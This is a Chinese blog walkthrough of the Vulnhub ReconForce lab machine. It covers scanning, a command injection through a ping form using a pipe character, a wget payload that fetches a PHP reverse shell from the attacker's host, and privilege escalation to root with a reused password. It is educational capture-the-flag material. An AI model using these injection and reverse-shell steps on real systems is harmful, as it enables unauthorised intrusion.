首页 > 其他分享 >Vulnhub ReconForce靶机解题详细过程

Vulnhub ReconForce靶机解题详细过程

时间:2022-11-12 10:58:22浏览次数:37  
标签:56.170 sbin kali ReconForce 192.168 Vulnhub 靶机 root usr

ReconForce

识别目标主机IP地址

─(kali㉿kali)-[~/Vulnhub/ReconForce]
└─$ sudo netdiscover -i eth1
3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                                                                                                                            
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:0a      1      60  Unknown vendor                                                                                                                                                           
 192.168.56.100  08:00:27:12:7e:24      1      60  PCS Systemtechnik GmbH                                                                                                                                                   
 192.168.56.170  08:00:27:d6:e8:de      1      60  PCS Systemtechnik GmbH           

利用Kali Linux自带的netdiscover工具识别目标主机的IP地址为192.168.56.170

NMAP扫描

└─$ sudo nmap -sS -sV -sC -p- 192.168.56.170 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-11 20:34 EST
Nmap scan report for bogon (192.168.56.170)
Host is up (0.00017s latency).
Not shown: 65532 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 2.0.8 or later
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:192.168.56.137
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 2
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open  ssh     OpenSSH 8.0p1 Ubuntu 6build1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 6f:96:94:65:72:80:08:93:23:90:20:bc:76:df:b8:ec (RSA)
|   256 6f:bb:49:1a:a9:b6:e5:00:84:19:a0:e4:2b:c4:57:c4 (ECDSA)
|_  256 ce:3d:94:05:f4:a6:82:c4:7f:3f:ba:37:1d:f6:23:b0 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title:  Recon_Web
|_http-server-header: Apache/2.4.41 (Ubuntu)
MAC Address: 08:00:27:D6:E8:DE (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.95 seconds

目标主机有3个开放端口,分别是21(运行FTP服务)、22(运行SSH服务)以及80(运行HTTP服务)

Get Access

┌──(kali㉿kali)-[~/Vulnhub/ReconForce]
└─$ ftp 192.168.56.170
Connected to 192.168.56.170.
220 "Security@hackNos".
Name (192.168.56.170:kali): anonymous
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -alh
229 Entering Extended Passive Mode (|||35031|)
150 Here comes the directory listing.
drwxr-xr-x    2 0        117          4096 Jan 06  2020 .
drwxr-xr-x    2 0        117          4096 Jan 06  2020 ..
226 Directory send OK.
ftp> ls
229 Entering Extended Passive Mode (|||37248|)
150 Here comes the directory listing.
226 Directory send OK.
ftp> quit
221 Goodbye.

FTP服务没有暴漏太多信息。

┌──(kali㉿kali)-[~/Vulnhub/ReconForce]
└─$ searchsploit vsftpd 3.0.3                                  
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                                                                             |  Path
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
vsftpd 3.0.3 - Remote Denial of Service                                                                                                                                                    | multiple/remote/49719.py
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
                            
──(kali㉿kali)-[~/Vulnhub/ReconForce]
└─$ curl http://192.168.56.170            
<!DOCTYPE HTML>
<html>
<head>
<title> Recon_Web</title>
<link rel="stylesheet" type="text/css" href="css/style.css">

</head>
<body>
<header>
<div class="main">
  <div class="logo">
  <img src="logo.png">
  </div>
<ul>
<li><a href="#">Home</a></li>
<li><a href="https://www.reconforce.in" target="_blank">Service</a></li>
<li><a href="https://www.hacknos.com/os-hacknos-3-walkthrough-vulnhub-ctf/" target="_blank">Blog</a></li>>
</ul>

</div>

<div class="title">
<h1>hackNos</h1></div>

<div class="button">
<a href="5ecure/" class="btn">TroubleShoot</a>>
</div>
    
</header>

</body>

</html>

返回的页面含有5ecure/链接,但该页面有认证机制,暂时搁置。

┌──(kali㉿kali)-[~/Vulnhub/ReconForce]
┌──(kali㉿kali)-[~/Vulnhub/ReconForce]
└─$ gobuster dir -u http://192.168.56.170 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.170
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.2.0-dev
[+] Timeout:                 10s
===============================================================
2022/11/11 20:52:22 Starting gobuster in directory enumeration mode
===============================================================
/css                  (Status: 301) [Size: 314] [--> http://192.168.56.170/css/]
/server-status        (Status: 403) [Size: 279]
Progress: 219753 / 220561 (99.63%)===============================================================
2022/11/11 20:53:27 Finished
===============================================================
                                                                                                                                                                                                                                            
┌──(kali㉿kali)-[~/Vulnhub/ReconForce]
└─$ gobuster dir -u http://192.168.56.170 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.sh,.txt
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.170
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.2.0-dev
[+] Extensions:              php,html,sh,txt
[+] Timeout:                 10s
===============================================================
2022/11/11 20:53:40 Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 660]
/.html                (Status: 403) [Size: 279]
/.php                 (Status: 403) [Size: 279]
/css                  (Status: 301) [Size: 314] [--> http://192.168.56.170/css/]
/.html                (Status: 403) [Size: 279]
/.php                 (Status: 403) [Size: 279]
/server-status        (Status: 403) [Size: 279]
Progress: 1101979 / 1102805 (99.93%)===============================================================
2022/11/11 20:59:19 Finished
===============================================================
                                                                                                                                                                                                                                            
┌──(kali㉿kali)-[~/Vulnhub/ReconForce]
└─$ nikto -h http://192.168.56.170
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.170
+ Target Hostname:    192.168.56.170
+ Target Port:        80
+ Start Time:         2022-11-11 20:59:47 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.41 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /, inode: 294, size: 59bd0f09b74ac, mtime: gzip
+ Allowed HTTP Methods: GET, POST, OPTIONS, HEAD 
+ OSVDB-3268: /css/: Directory indexing found.
+ OSVDB-3092: /css/: This might be interesting...
+ 7915 requests: 0 error(s) and 7 item(s) reported on remote host
+ End Time:           2022-11-11 21:00:41 (GMT-5) (54 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested


      *********************************************************************
      Portions of the server's headers (Apache/2.4.41) are not in
      the Nikto 2.1.6 database or are newer than the known string. Would you like
      to submit this information (*no server specific data*) to CIRT.net
      for a Nikto update (or you may email to [email protected]) (y/n)? n

                                                                                                                                                                                                                                            
┌──(kali㉿kali)-[~/Vulnhub/ReconForce]
└─$ dirb http://192.168.56.170

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Fri Nov 11 21:01:03 2022
URL_BASE: http://192.168.56.170/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.56.170/ ----
==> DIRECTORY: http://192.168.56.170/css/                                                                                                                                                                                                  
+ http://192.168.56.170/index.html (CODE:200|SIZE:660)                                                                                                                                                                                     
+ http://192.168.56.170/server-status (CODE:403|SIZE:279)                                                                                                                                                                                  
                                                                                                                                                                                                                                           
---- Entering directory: http://192.168.56.170/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
-----------------
END_TIME: Fri Nov 11 21:01:06 2022
DOWNLOADED: 4612 - FOUND: 

目录扫描似乎没啥收获。

┌──(kali㉿kali)-[~/Vulnhub/ReconForce]
└─$ wget http://192.168.56.170/css/2.jpg                                          
--2022-11-11 21:04:11--  http://192.168.56.170/css/2.jpg
Connecting to 192.168.56.170:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 502241 (490K) [image/jpeg]
Saving to: ‘2.jpg’

2.jpg                                                      100%[========================================================================================================================================>] 490.47K  --.-KB/s    in 0.002s  

2022-11-11 21:04:11 (212 MB/s) - ‘2.jpg’ saved [502241/502241]

                                                                                                                                                                                                                                            
┌──(kali㉿kali)-[~/Vulnhub/ReconForce]
└─$ ls
2.jpg  nmap_full_scan
                                                                                                                                                                                                                                            
┌──(kali㉿kali)-[~/Vulnhub/ReconForce]
└─$ steghide extract -sf 2.jpg    
Enter passphrase: 
                                                                                                                                                                                                                                            
┌──(kali㉿kali)-[~/Vulnhub/ReconForce]
└─$ stegseek 2.jpg /usr/share/wordlists/rockyou.txt 
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek

[i] Progress: 99.85% (133.2 MB)           
[!] error: Could not find a valid passphrase.

参考其他人的解题拖车,FTP登陆时,作者有提示:

┌──(kali㉿kali)-[~/Vulnhub/ReconForce]
└─$ ftp 192.168.56.170
Connected to 192.168.56.170.
220 "Security@hackNos".
Name (192.168.56.170:kali): anonymous
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> 

这里的Security@hackNos可能是用户名或者密码,而在Web侦察阶段,只发现了一个需要认证的页面,也许这是这个页面的密码(用户名admin)

发现可以成功登录,登录后有个Ping_scan功能,

输入127.0.0.1:

返回:

PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.015 ms
64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.027 ms
64 bytes from 127.0.0.1: icmp_seq=3 ttl=64 time=0.025 ms
64 bytes from 127.0.0.1: icmp_seq=4 ttl=64 time=0.028 ms

--- 127.0.0.1 ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 3052ms
rtt min/avg/max/mdev = 0.015/0.023/0.028/0.005 ms

可以成功执行ping命令,那接下来看有没有命令注入漏洞

输入:127.0.0.1;ls 没有返回结果

输入:127.0.0.1&&ls 没有返回结果

推测有某种过滤机制。

但是并没有过滤管道符

输入:127.0.0.1|ls,可以成功返回:

css
index.html
logo.png
out.php

输入:127.0.0.1|cat out.php,可以返回out.php源代码:

'',
        ';'  => '',
        '| ' => '',
        '-'  => '',
        '$'  => '',
        '('  => '',
        ')'  => '',
        '`'  => '',
        '||' => '',
    );

    // Remove any of the charactars in the array (blacklist).
    $target = str_replace( array_keys( $substitutions ), $substitutions, $target );

    // Determine OS and execute the ping command.
    if( stristr( php_uname( 's' ), 'Windows NT' ) ) {
        // Windows
        $cmd = shell_exec( 'ping  ' . $target );
    }
    else {
        // *nix
        $cmd = shell_exec( 'ping  -c 4 ' . $target );
    }

    // Feedback for the end user
    echo "

{$cmd}

";
}

?> php

从代码可以看出注意如果管道符后面有空格,那也会被过滤(所以要做多种尝试)

接下来可以将shell.php下载到目标主机,然后执行

┌──(kali㉿kali)-[~/Vulnhub/ReconForce]
└─$ cp ~/Tools/php_reverse_shell/php-reverse-shell-1.0/php-reverse-shell.php .
                                                                                                                                                                                                                                            
┌──(kali㉿kali)-[~/Vulnhub/ReconForce]
└─$ ls
2.jpg  nmap_full_scan  php-reverse-shell.php
                                                                                                                                                                                                                                            
┌──(kali㉿kali)-[~/Vulnhub/ReconForce]
└─$ mv php-reverse-shell.php shell.php
                                                                                                                                                                                                                                            
┌──(kali㉿kali)-[~/Vulnhub/ReconForce]
└─$ vim shell.php 
                                                                                                                                                                                                                                            
┌──(kali㉿kali)-[~/Vulnhub/ReconForce]
└─$ python -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

输入127.0.0.1|wget http://192.168.56.137:8000/shell.php

输入127.0.0.1|ls,返回结果可知已经成功下载shell.php:

css
index.html
logo.png
out.php
shell.php

然后从浏览器访问/shell.php,而Kali Linux本地启动监听:

┌──(kali㉿kali)-[~/Vulnhub/ReconForce]
└─$ sudo nc -nlvp 5555                                         
[sudo] password for kali: 
listening on [any] 5555 ...
connect to [192.168.56.137] from (UNKNOWN) [192.168.56.170] 46396
Linux hacknos 5.3.0-24-generic #26-Ubuntu SMP Thu Nov 14 01:33:18 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
 10:24:35 up 53 min,  0 users,  load average: 0.00, 0.03, 0.63
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ bash -i
bash: cannot set terminal process group (933): Inappropriate ioctl for device
bash: no job control in this shell
www-data@hacknos:/$ 

在Kali Linux成功得到了目标主机的shell:

┌──(kali㉿kali)-[~/Vulnhub/ReconForce]
└─$ sudo nc -nlvp 5555                                         
[sudo] password for kali: 
listening on [any] 5555 ...
connect to [192.168.56.137] from (UNKNOWN) [192.168.56.170] 46396
Linux hacknos 5.3.0-24-generic #26-Ubuntu SMP Thu Nov 14 01:33:18 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
 10:24:35 up 53 min,  0 users,  load average: 0.00, 0.03, 0.63
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ bash -i
bash: cannot set terminal process group (933): Inappropriate ioctl for device
bash: no job control in this shell
www-data@hacknos:/$ 

www-data@hacknos:/var/www$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
uuidd:x:106:111::/run/uuidd:/usr/sbin/nologin
tcpdump:x:107:112::/nonexistent:/usr/sbin/nologin
landscape:x:108:114::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
recon:x:1000:119:rahul:/home/recon:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
ftp:x:111:117:ftp daemon,,,:/srv/ftp:/usr/sbin/nologin
mysql:x:112:118:MySQL Server,,,:/nonexistent:/bin/false
dnsmasq:x:113:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
www-data@hacknos:/var/www$ cd /home
cd /home
www-data@hacknos:/home$ ls -alh
ls -alh
total 12K
drwxr-xr-x  3 root  root   4.0K Jan 10  2020 .
drwxr-xr-x 20 root  root   4.0K Jan  6  2020 ..
drwxr-xr-x  4 recon docker 4.0K Jan 10  2020 recon
www-data@hacknos:/home$ cd recon
cd recon
www-data@hacknos:/home/recon$ ls -alh
ls -alh
total 32K
drwxr-xr-x 4 recon docker 4.0K Jan 10  2020 .
drwxr-xr-x 3 root  root   4.0K Jan 10  2020 ..
-rw------- 1 recon docker    0 Jan 10  2020 .bash_history
-rw-r--r-- 1 recon docker  220 May  5  2019 .bash_logout
-rw-r--r-- 1 recon docker 3.7K May  5  2019 .bashrc
drwx------ 2 recon docker 4.0K Jan  6  2020 .cache
drwx------ 3 recon docker 4.0K Jan  6  2020 .gnupg
-rw-r--r-- 1 recon docker  807 May  5  2019 .profile
-rw-r--r-- 1 recon docker    0 Jan  6  2020 .sudo_as_admin_successful
-rw-r--r-- 1 root  root     87 Jan 10  2020 user.txt
www-data@hacknos:/home/recon$ cat user.txt
cat user.txt
###########################################

MD5HASH: bae11ce4f67af91fa58576c1da2aad4b
www-data@hacknos:/home/recon$ cat .bash_history
cat .bash_history
cat: .bash_history: Permission denied
www-data@hacknos:/home/recon$ 

提权

搜罗了一遍目标主机的目录和文件,貌似需要首先Lateral Movement到recon用户,recon用户有sudo权限,但是如何做呢?联想到ftp登录时用的密码,

www-data@hacknos:/home/recon$ su - recon
su - recon
Password: Security@hackNos
id
uid=1000(recon) gid=119(docker) groups=119(docker),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),115(lxd)
which python
/usr/bin/python
python -c 'import pty;pty.spawn("/bin/bash")'
recon@hacknos:~$ sudo -l
sudo -l
[sudo] password for recon: Security@hackNos

Matching Defaults entries for recon on hacknos:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User recon may run the following commands on hacknos:
    (ALL : ALL) ALL
recon@hacknos:~$ sudo bash
sudo bash
root@hacknos:/home/recon# cd /root
cd /root
root@hacknos:~# ls -alh
ls -alh
total 40K
drwx------  6 root root 4.0K Jan 17  2020 .
drwxr-xr-x 20 root root 4.0K Jan  6  2020 ..
-rw-------  1 root root    0 Jan 10  2020 .bash_history
-rw-r--r--  1 root root 3.1K Aug 27  2019 .bashrc
drwx------  2 root root 4.0K Jan 17  2020 .cache
drwx------  3 root root 4.0K Jan 17  2020 .gnupg
-rw-r--r--  1 root root  148 Aug 27  2019 .profile
-rw-r--r--  1 root root  876 Jan 10  2020 root.txt
drwxr-xr-x  3 root root 4.0K Jan  6  2020 snap
drwx------  2 root root 4.0K Jan  6  2020 .ssh
-rw-------  1 root root  856 Jan 17  2020 .viminfo
root@hacknos:~# cat root.txt
cat root.txt
     $$\          $$$$$$$\                                          
     \$$\         $$  __$$\                                         
$$$$\ \$$\        $$ |  $$ | $$$$$$\   $$$$$$$\  $$$$$$\  $$$$$$$\  
\____| \$$\       $$$$$$$  |$$  __$$\ $$  _____|$$  __$$\ $$  __$$\ 
$$$$\  $$  |      $$  __$$< $$$$$$$$ |$$ /      $$ /  $$ |$$ |  $$ |
\____|$$  /       $$ |  $$ |$$   ____|$$ |      $$ |  $$ |$$ |  $$ |
     $$  /        $$ |  $$ |\$$$$$$$\ \$$$$$$$\ \$$$$$$  |$$ |  $$ |
     \__/         \__|  \__| \_______| \_______| \______/ \__|  \__|
                                                                    
                                                                    
                                                                    

MD5HASH: bae11ce4f67af91fa58576c1da2aad4b

Author: Rahul Gehlaut

WebBlog: www.hackNos.com

Twitter: @rahul_gehlaut
root@hacknos:~# 

成功提权!

这个靶机给我们重要的提示: 作者在设计靶机时,不同寻常的信息,比如FTP返回的不一般的Banner都会非常有用。

标签:56.170,sbin,kali,ReconForce,192.168,Vulnhub,靶机,root,usr
From: https://www.cnblogs.com/jason-huawen/p/16882871.html

相关文章

  • vulnhub靶场之DOUBLETROUBLE: 1
    准备:攻击机:虚拟机kali、本机win10。靶机:DOUBLETROUBLE:1,网段地址我这里设置的桥接,所以与本机电脑在同一网段,下载地址:https://download.vulnhub.com/doubletrouble/doubl......
  • Vulnhub Potato靶机解题过程
    Potato识别目标主机IP地址─(kali㉿kali)-[~/Vulnhub/Potato]└─$sudonetdiscover-ieth1Currentlyscanning:192.168.85.0/16|ScreenView:UniqueHosts......
  • Vulnhub OSCP靶机解题过程
    OSCP识别目标主机IP地址┌──(kali㉿kali)-[~/Vulnhub/OSCP]└─$sudonetdiscover-ieth13CapturedARPReq/Reppackets,from3hosts.Totalsize:180......
  • vulnhub靶场之DRIPPING BLUES: 1
    准备:攻击机:虚拟机kali、本机win10。靶机:DRIPPINGBLUES:1,网段地址我这里设置的桥接,所以与本机电脑在同一网段,下载地址:https://download.vulnhub.com/drippingblues/drip......
  • 靶机: EvilBox---One
    靶机:EvilBox---One准备工作靶机地址:https://download.vulnhub.com/evilbox/EvilBox---One.ovaMD5校验:c3a65197b891713731e6bb791d7ad259cmd进行校验:certu......
  • Vulnhub Noontide靶机解题过程
    Noontide识别目标主机IP地址......
  • vulnhub-dc4
    一.环境简介靶机:192.168.56.106攻击机:Windows10、kali(192.168.56.101)二、渗透测试复现1.信息收集我这里提前已经知道我的靶机IP地址为192.168.56.1/24,因为kali与靶机......
  • Vulnhub My Tomcat靶机解题过程
    MyTomcat识别目标主机IP地址─(kali㉿kali)-[~/Vulnhub/My_Tomcat]└─$sudonetdiscover-ieth14CapturedARPReq/Reppackets,from3hosts.Totalsize:24......
  • Vulnhub My File Server 2靶机解题过程
    MyFileServer2识别目标主机IP地址──(kali㉿kali)-[~/Vulnhub/My_File_Server_2]└─$sudonetdiscover-ieth14CapturedARPReq/Reppackets,from3hosts.......
  • 靶机遇漏洞系列(一):DNS域传送漏洞
    靶机遇漏洞系列,记录在打靶机过程中遇到的漏洞,学习其原理和利用方式。靶机地址:​​https://www.vulnhub.com/entry/hacker-kid-101,719/​​漏洞原理DNS协议支持使用axfr类型......